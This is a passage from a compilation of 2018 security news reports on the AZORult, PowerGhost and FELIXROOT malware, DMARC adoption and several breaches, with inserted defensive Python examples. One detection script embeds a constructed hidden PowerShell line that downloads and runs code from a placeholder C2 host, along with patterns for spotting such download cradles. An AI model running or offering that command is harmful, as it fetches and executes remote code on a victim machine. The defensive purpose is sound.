[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase

The conditional loader allows the attackers to infect only systems with specific characteristics; for example, it can check whether certain desired cookies or saved passwords from specific sites are present on the victim’s machine.

After the malware has successfully connected to the C&C server, the server sends back the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5. The stolen information is organized into sections:

info: basic computer information such as Windows version and computer name
pwds: this section contains stolen passwords (not confirmed)
cooks: cookies or visited sites
file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.

Once this phase is completed, AZORult may download the next-stage payload.
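The report format described above (repeating 3-byte XOR, then named sections) is simple enough to decode in a few lines, and the fixed section names give an analyst a known-plaintext crib with which to recover the key from captured traffic. The following is an added example, not code from the Proofpoint analysis; the section-header layout, the key and the sample contents are constructed assumptions, since the exact wire format is not given on the page.

```python
"""Decode a constructed AZORult-style C&C report.

Added example, not from the Proofpoint analysis. The analysis states that AZORult's
report to its C&C is XOR-encoded with a 3-byte repeating key and organised into
sections (info, pwds, cooks, file). The plaintext layout used here (a "name:" header
line per section), the key and the sample contents are constructed assumptions; only
the 3-byte repeating XOR and the section names come from the analysis.
"""

SECTION_NAMES = ("info", "pwds", "cooks", "file")


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so this encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int = 3) -> bytes:
    """Recover a repeating XOR key from a known plaintext prefix (crib) of >= key_len bytes.

    Each key byte is simply ciphertext[i] XOR plaintext[i] for the first key_len positions.
    """
    if len(known_prefix) < key_len or len(ciphertext) < key_len:
        raise ValueError("crib and ciphertext must both be at least key_len bytes")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


def parse_report(plaintext: str) -> dict:
    """Split a decoded report into {section_name: [lines]} using the assumed header layout."""
    sections = {}
    current = None
    for line in plaintext.splitlines():
        if line.endswith(":") and line[:-1] in SECTION_NAMES:
            current = line[:-1]
            sections[current] = []
        elif current is not None and line:
            sections[current].append(line)
    return sections


def decode_report(ciphertext: bytes, crib: bytes = b"info:") -> dict:
    """Recover the key from the crib, decode the report and parse it into sections."""
    key = recover_key(ciphertext, crib)
    return parse_report(xor_repeating(ciphertext, key).decode("utf-8", errors="replace"))


# Constructed sample report in the assumed plaintext layout (values are placeholders)
SAMPLE_PLAINTEXT = """info:
Windows 10 Pro
DESKTOP-EXAMPLE
pwds:
https://mail.example.test|alice|<redacted>
cooks:
www.example.test
file:
machine_id=00000000-0000-0000-0000-000000000000
cpu=Example CPU x4
"""
SAMPLE_KEY = b"\x3b\xa7\x51"   # constructed; the real key is not on the page
SAMPLE_CIPHERTEXT = xor_repeating(SAMPLE_PLAINTEXT.encode(), SAMPLE_KEY)

if __name__ == "__main__":
    print("recovered key:", recover_key(SAMPLE_CIPHERTEXT, b"info:").hex())
    for name, lines in decode_report(SAMPLE_CIPHERTEXT).items():
        print(name, lines)
```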

The experts attributed the campaign to the TA516 threat actor, which is focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requires significant user interaction, which helps it evade antivirus. The victim has to open the password-protected attached document, and only after entering the password shown in the body of the email does the attack proceed by asking the user to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.

Titan Security Keys- Google announced USB-based FIDO U2F Keys
31.7.2018 securityaffairs Crypto

Google will start offering Titan Security Keys to provide a further layer of security to its users and protect them from phishing and MiTM attacks.
Google announced at Google Cloud Next ’18 convention in San Francisco the launch of the Titan Security Keys, a USB device that is used as part of its hardware-based two-factor authentication scheme for online accounts.

“Titan Security Key, available now to Cloud customers, and coming soon to the Google Store” states a blog post published by Google.

The hardware-based two-factor authentication scheme is designed to prevent account takeover via phishing and MiTM attacks even when the attacker has obtained the user’s credentials.


Google shared data on the use of physical security keys by its personnel over recent months; the tech giant confirmed that none of its 85,000 employees who use the hardware-based two-factor authentication key has fallen victim to phishing attacks.

“We have had no reported or confirmed account takeovers since implementing security keys at Google” a Google spokesperson said.

“Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”

The authentication through the physical USB security key is more secure compared to other processes.

Titan Security Keys are based on the FIDO (Fast IDentity Online) Alliance’s U2F (Universal 2nd Factor) protocol and were entirely designed by Google.

The Titan Security Key is available in both USB and Bluetooth versions; Google will offer it for sale in the Google online store within the next few months.

Logging in on mobile devices will require the Bluetooth version of the key.

Google did not reveal the price for Titan Security Keys, but rumors say it will be available for around $20 or $30.

The Titan keys will be compatible with the major browsers (Chrome, Firefox, and Opera) and many online services, including Dropbox, Facebook and GitHub.

Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, and employs multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

PowerGhost leverages the NSA-linked EternalBlue exploit to spread. It is an obfuscated PowerShell script containing the malware's core code along with several add-on modules: the miner, the miner's libraries, the Mimikatz post-exploitation tool, a module for reflective PE injection, and shellcode for the EternalBlue exploit.

The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During the infection phase, a one-line PowerShell script is executed to download the core miner component and run it, with the whole process taking place in memory.

The first thing the malware does is check the command and control (C&C) server and, if a new version is available, download and execute it.

The malware then uses the Mimikatz tool to obtain user account credentials from the machine and uses them to attempt lateral movement inside the target network.

“Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.

“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once a machine is infected, PowerGhost attempts to escalate privileges by using various exploits, such as the one for CVE-2018-8120.

To establish a foothold in the infected system, PowerGhost saves all the modules as properties of a WMI class, while the miner's main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Colombia, and Turkey.

Experts also discovered a PowerGhost version that implements DDoS capability, which leads Kaspersky to believe that the authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Kaspersky.

Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency

The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.

The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.

The new threat proves once again that the growing popularity and exchange rates of cryptocurrencies have led cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.

PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.

During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.

After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.

Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).

After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).

All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.
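
The WMI persistence described here and in the securityaffairs write-up above (modules stored as properties of a WMI class, the one-line loader re-run from a WMI subscription every 90 minutes) is what a defender can hunt for. The following is an added example and not Kaspersky's tooling: it triages records shaped like the output of Get-CimInstance -Namespace root\subscription for the __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding classes, decodes any -EncodedCommand argument (UTF-16LE base64) and flags bindings whose consumer runs code, especially on a periodic trigger. The records, the consumer and filter names, the host name and the URL below are constructed; the 5400-second polling interval only mirrors the 90-minute cadence reported for PowerGhost.

```python
"""Triage WMI permanent event subscriptions for fileless persistence.

Added example (not Kaspersky's tooling). The records below are constructed
to look like what Get-CimInstance -Namespace root\\subscription returns for
__EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding.
"""
import base64
import re
from dataclasses import dataclass, field

# Consumer classes that run attacker-supplied code when their filter fires.
CODE_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}

# Command-line fragments typical of one-line PowerShell downloaders.
SUSPICIOUS_ARGS = re.compile(
    r"-nop\b|-w(?:indowstyle)?\s+hidden|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|downloadstring|downloaddata",
    re.IGNORECASE,
)
# Event sources commonly used as a periodic trigger (timers, perf counters, clock).
PERIODIC_TRIGGERS = re.compile(
    r"__TimerEvent|__IntervalTimerInstruction|Win32_PerfFormattedData|Win32_LocalTime",
    re.IGNORECASE,
)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


@dataclass
class Finding:
    binding: str
    command: str
    reasons: list = field(default_factory=list)


def decode_encoded_command(command_line):
    """Plaintext of a PowerShell -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(filters, consumers, bindings):
    """filters: name -> WQL query; consumers: name -> (class, command line);
    bindings: list of (filter name, consumer name). Returns one Finding per
    binding that matched at least one heuristic, listing every reason."""
    findings = []
    for filt, cons in bindings:
        cls, cmd = consumers.get(cons, ("", ""))
        query = filters.get(filt, "")
        reasons = []
        if cls in CODE_CONSUMERS:
            reasons.append(f"consumer class {cls} executes commands/scripts")
        if SUSPICIOUS_ARGS.search(cmd):
            reasons.append("command line uses PowerShell download/obfuscation switches")
        decoded = decode_encoded_command(cmd)
        if decoded and re.search(r"downloadstring|\biex\b|invoke-expression", decoded, re.I):
            reasons.append("decoded -EncodedCommand fetches and runs remote code")
        if PERIODIC_TRIGGERS.search(query):
            reasons.append("filter fires on a periodic/timer event source")
        if reasons:
            findings.append(Finding(f"{filt} -> {cons}", cmd, reasons))
    return findings


# Constructed sample: the default Windows SCM binding plus one that mimics a
# fileless miner's loader (the consumer name and the URL are placeholders).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

FILTERS = {
    "SCM Event Log Filter": "select * from MSFT_SCMEventLogEvent",
    "UpdaterFilter": "SELECT * FROM __InstanceModificationEvent WITHIN 5400 "
                     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",
}
CONSUMERS = {
    "SCM Event Log Consumer": ("NTEventLogEventConsumer", ""),
    "UpdaterConsumer": ("CommandLineEventConsumer",
                        "powershell.exe -NoP -W Hidden -Enc " + ENC),
}
BINDINGS = [("SCM Event Log Filter", "SCM Event Log Consumer"),
            ("UpdaterFilter", "UpdaterConsumer")]

if __name__ == "__main__":
    for f in triage(FILTERS, CONSUMERS, BINDINGS):
        print(f.binding)
        for r in f.reasons:
            print("  -", r)
        print("  decoded:", decode_encoded_command(f.command))
```

On a live host, export the three classes with Get-CimInstance and feed them in the same shape. The default SCM Event Log binding is not reported because its consumer class only writes event-log entries; a CommandLineEventConsumer bound to a perf-counter or timer filter is the pattern to review, whatever name it carries.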

One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.

This DDoS function is the only one that copies files to the hard drive, and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware separately, because it is launched in a peculiar manner: the DDoS module and a function to launch it are downloaded and saved to disk separately.

To date, PowerGhost has mainly been observed within corporate local area networks and has mostly been encountered in India, Brazil, Colombia, and Turkey.

State of Email Security: What Can Stop Email Threats?
30.7.2018 securityweek Security

Neither Current Technology Nor Security Awareness Training Will Stop Email Threats

A survey of 295 professionals -- mostly but not entirely IT professionals -- has found that 85% of respondents see email threats bypass email security controls and make it into the inbox; 40% see weekly threats; and 20% have to take significant remediation action on a weekly basis.

Email security firm GreatHorn wanted to examine the state of email security today, nearly fifty years after email was first developed. Its findings (PDF) will not surprise security professionals. Breach analyses regularly conclude that more than 90% of all breaches start with an email attack. Indeed, the GreatHorn research shows that the majority (54.4%) of corporate security leaders (that is, those who hold the CISO role) consider email security to be a top 3 security priority.

What is surprising is not that email security is failing (almost half -- 46.1% -- of all respondents said they were less than 'satisfied' with their current email security solution), but the discrepancy in threat perception between the security professional respondents (comprising 61% of the sample) and the non-security respondents (the laypeople, comprising 39% of the sample).

"Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam," GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek. "I suspect there is a little bit of a confluence of different things in this figure, and that when they say 'spam', they don't only mean unsolicited marketing emails. Nevertheless, it is a dismissal of the severity of the risk that email poses."

This figure changes dramatically when asked of the security professionals among the respondents. "When you narrow the interview stats to security professionals, less than 16% said that spam was the main threat they faced," he continued. "So, you have 85% of all security teams saying that there is a wide range of different kinds of threats that come in every single day via email -- but to the lay user, the only thing that ever goes wrong is that you get some email you don't want."

O'Brien also quoted statistics from Gartner email specialist Neil Wynne: "The email open rate for the average white-collar professional within the bounds of their work email is 100%," said O'Brien. "Whether or not you take any action in response to it, you will open the email."

It is true that you can open a malicious email and take no action whatsoever and you will remain safe. But that clearly doesn't happen. GreatHorn's figures show that 20% of the security professional respondents are forced into direct remediation from email threats (such as suspending compromised accounts, PowerShell scripts, resetting compromised third-party accounts, etc).

The implication, at a simplistic level, is that the average non-security member of staff is highly likely to open all emails; is not likely to expect anything other than spam (31% of the laypeople respondents said they never saw any email threats other than spam); and clearly -- from empirical proof -- will too often click on a malicious link or open a weaponized attachment.

Asked if a further implication from these figures is that security awareness training is failing, O'Brien said, "Yes." There are qualifications to this response, because phish training companies' built-in metrics clearly demonstrate an improvement in the click-thru rates for users trained with their systems. Reductions in successful phishing from a 30% success rate to just 10% are not uncommon.

But, said O'Brien, "Verizon has reported that one in 25 people click on any given phishing attack." This suggests that for every 100 members of staff targeted by a phishing email, four will become victims -- and only one is necessary for a breach to occur.

The difficulty is the nature of modern email attacks. Many involve some form of impersonation, including BEC attacks, business spoofing attacks, and pure social engineering attacks from a colleague whose credentials have been acquired by the attacker. "You cannot train people to have awareness of an email threat when information about that threat is not visible to the user. There is very little functional way to train a user to differentiate between an email from a colleague and an email from someone who has stolen the colleague's credentials. So, we have a security awareness market that has used marketing to say that email security is an awareness problem, a people problem, and that you can train your way out of it. You cannot."

He added, "The reason that security awareness training companies are successful is because awareness training represents a tick in a compliance box that clears a company of gross negligence in the event they suffer a data breach." So, despite the fact it isn't really effective, you still need to do it.

GreatHorn's own view of the problem is that the solution must come from not just technology, nor simply people, but from using technology against the social engineering aspect of the threat -- that is, the content as well as the mechanics of the email.

Belmont, Mass-based GreatHorn announced a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures in June 2017. It brings machine-learning technology to the continuing threat and problem of targeted spear phishing and the related BEC threat -- the latter of which, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."

Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek Vulnerebility Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.

Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch a remote shell, terminate the connection to the C&C, download and run a batch script, download a file, and upload a file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.

DMARC Fully Implemented by Half of U.S. Government Agencies
30.7.2018 securityweek

More than half of U.S. government agencies have fully implemented the DMARC email security standard in response to a binding operational directive from the Department of Homeland Security, according to email threat protection company Agari.

The DHS issued the Binding Operational Directive (BOD) 18-01 in mid-October 2017, instructing all federal agencies to make plans and start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

Agencies were given one year to fully implement DMARC (i.e. set their DMARC policy to “reject”).

Agari has been monitoring more than 1,000 government domains to check their status. Shortly after the DHS issued the BOD, only 18% had implemented at least a minimal DMARC policy. By December 2017, nearly half had rolled out DMARC, but only 16% had set a “quarantine” or “reject” policy.

Agari’s latest report shows that 922 government-owned domains, representing 81% of the total, had enabled DMARC as of July 15. Nearly 600, representing 52%, have set a “reject” policy.

DMARC status in U.S. federal agencies

While this may seem like significant progress, Agari pointed out that two-thirds of the domains with a “reject” policy are “defensive domains,” which are not configured for sending email.

“Moving defensive domains to a DMARC enforcement policy is generally an easier process than moving active domains that send email, and also need to account for 3rd parties sending email on the agency’s behalf as well as specific mail servers permitted to send email,” Agari said in its report.
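
The policy states Agari counted (none, quarantine, reject) and the distinction between defensive and sending domains can both be checked from DNS alone. The following is an added example and not Agari's methodology: it classifies a set of domains against the BOD 18-01 end state of p=reject and also surfaces two caveats a nominal p=reject carries under the DMARC specification, a pct tag below 100 (only that share of failing mail is rejected) and an sp tag weaker than p (subdomains fall back to the weaker policy). Lookups are replaced by a constructed table of TXT records, the domain names are placeholders, and the defensive-domain rule (an SPF record that authorises no sender at all) is this example's own heuristic, not a definition from the report.

```python
"""Classify domains against BOD 18-01's DMARC end state (p=reject).

Added example, not Agari's methodology. DNS is replaced by a constructed
table of TXT records so it runs offline; the domain names are placeholders.
"""


def parse_tags(txt):
    """Split a DMARC-style 'k=v; k=v' record into a lowercase-keyed dict."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def dmarc_policy(txt_records):
    """Return the parsed DMARC record among the _dmarc TXT strings, or None."""
    for txt in txt_records:
        tags = parse_tags(txt)
        if tags.get("v", "").upper() == "DMARC1":
            return tags
    return None


def is_defensive(spf_records):
    """Heuristic (this example's own): 'v=spf1 -all' with no other mechanism
    means the domain authorises no sender, i.e. it never sends mail."""
    for txt in spf_records:
        terms = txt.split()
        if terms and terms[0].lower() == "v=spf1":
            return [t.lower() for t in terms[1:]] == ["-all"]
    return False


def classify(domain, dns):
    """dns: {name: [TXT strings]}. Returns the enforcement state of one domain."""
    dmarc = dmarc_policy(dns.get(f"_dmarc.{domain}", []))
    result = {"domain": domain, "dmarc": dmarc is not None, "policy": None,
              "enforced": False, "defensive": is_defensive(dns.get(domain, [])),
              "notes": []}
    if dmarc is None:
        result["notes"].append("no DMARC record")
        return result
    policy = dmarc.get("p", "").lower()
    result["policy"] = policy
    result["enforced"] = policy == "reject"
    # Caveats that make a nominal p=reject weaker than the directive intends.
    pct = int(dmarc.get("pct", "100"))
    if policy == "reject" and pct < 100:
        result["notes"].append(f"pct={pct}: only that share of failing mail is rejected")
    sp = dmarc.get("sp", policy).lower()
    if policy == "reject" and sp != "reject":
        result["notes"].append(f"sp={sp}: subdomains fall back to a weaker policy")
    if "rua" not in dmarc:
        result["notes"].append("no rua= address, so no aggregate reports are received")
    return result


def summarise(domains, dns):
    """Counts in the shape of the report: DMARC present, p=reject, and p=reject on sending domains."""
    rows = [classify(d, dns) for d in domains]
    return {
        "total": len(rows),
        "with_dmarc": sum(r["dmarc"] for r in rows),
        "reject": sum(r["enforced"] for r in rows),
        "reject_active": sum(r["enforced"] and not r["defensive"] for r in rows),
        "rows": rows,
    }


# Constructed records (placeholder names, not real agency domains).
DNS = {
    "_dmarc.active.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@active.example"],
    "active.example": ["v=spf1 include:_spf.mail.example -all"],
    "_dmarc.parked.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@active.example"],
    "parked.example": ["v=spf1 -all"],
    "_dmarc.monitor.example": ["v=DMARC1; p=none; rua=mailto:dmarc@monitor.example"],
    "monitor.example": ["v=spf1 ip4:192.0.2.10 -all"],
    "_dmarc.partial.example": ["v=DMARC1; p=reject; pct=50; sp=none"],
    "partial.example": ["v=spf1 ip4:192.0.2.20 -all"],
    "legacy.example": ["v=spf1 ip4:192.0.2.30 ~all"],
}
DOMAINS = ["active.example", "parked.example", "monitor.example",
           "partial.example", "legacy.example"]

if __name__ == "__main__":
    s = summarise(DOMAINS, DNS)
    print(f"{s['reject']}/{s['total']} at p=reject, {s['reject_active']} of them on sending domains")
    for r in s["rows"]:
        print(r["domain"], r["policy"], "defensive" if r["defensive"] else "active", r["notes"])
```

Replacing the DNS table with real TXT lookups (for example via dnspython) turns this into the check Agari describes; the reject_active count is the number that matters for an agency whose domains actually send mail.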

The company has determined that 28 agencies have fully protected all their domains. Some government organizations still have some unprotected assets, but they have secured a significant number of domains.

For example, the Department of Health and Human Services has enabled DMARC with a “reject” policy on 92 of its 118 domains, while the Department of Justice has done so for 65 of its 75 domains.

“To fully reach compliance with BOD 18-01, and to protect the federal government from phishing attacks, many more executive branch agencies must still implement ‘p=reject.’ But in comparison to the private sector, the U.S. Government should serve as a shining example for the implementation of common security standards,” Agari said.

KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.2018 securityaffairs Incindent

ICO platforms are becoming a privileged target for hackers; the latest victim is KickICO, a blockchain crowdfunding website for ICOs.
On Friday, KickICO disclosed a security breach: according to the platform, attackers accessed its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26 at 09:04 UTC. KickICO CEO Anti Danilevski explained that the staff learned of the security breach from victims who complained to the company.

“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced that the situation was under control and the smart contract had been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners and invited them to get in touch via email at report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation into the security breach; its staff discovered that the attackers had managed to gain access to the private key of the KickICO platform that developers use to manage the KICK token smart contract.

Once they obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and create the same amount of tokens at 40 other wallets under their control. With this trick the overall number of tokens did not change, so the security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with its cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.

Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.2018 securityweek Incindent

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.

FELIXROOT Backdoor is back in a new fresh spam campaign
30.7.2018 securityaffairs Virus Spam

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used in cyber espionage operations.
The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,”

CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

CVE-2017-11882 is a remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

